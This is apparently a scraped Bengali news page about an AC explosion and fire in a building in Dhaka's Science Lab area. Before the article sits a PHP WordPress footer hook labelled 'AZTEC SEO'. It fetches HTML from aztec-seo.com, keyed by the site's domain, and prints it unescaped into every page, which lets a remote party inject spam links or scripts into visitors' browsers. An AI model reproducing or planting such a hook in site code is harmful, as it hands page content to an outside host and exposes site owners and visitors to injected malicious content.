/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
রাজধানী ঢাকার সায়েন্স ল্যাব এলাকায় একটি ভবনে বিস্ফোরণের পর আগুন লাগার ঘটনা ঘটেছে। আগুন নিয়ন্ত্রণে কাজ করছে ফায়ার সার্ভিসের কয়েকটি ইউনিট।
ডিউটি অফিসার খালিদ হোসেন ঘটনার সত্যতা নিশ্চিত করেছেন। তিনি জানান, রাজধানীর সায়েন্স ল্যাবরেটরি এলাকার একটি তিনতলা ভবনের তিনতলায় এসি বিস্ফোরণের পর আগুন ধরে গেছে। সকাল ১০টা ৫২ মিনিটে এ ঘটনা ঘটে।
জানা গেছে, আগুন নিয়ন্ত্রণে কাজ করছে ফায়ার সার্ভিসের কয়েকটি ইউনিট। বিস্ফোরণের পর ওই ভবনের সামনের সড়কে যান চলাচল বন্ধ হয়ে গেছে। তবে তাৎক্ষণিকভাবে ক্ষয়ক্ষতির কোনো খবর পাওয়া যায়নি।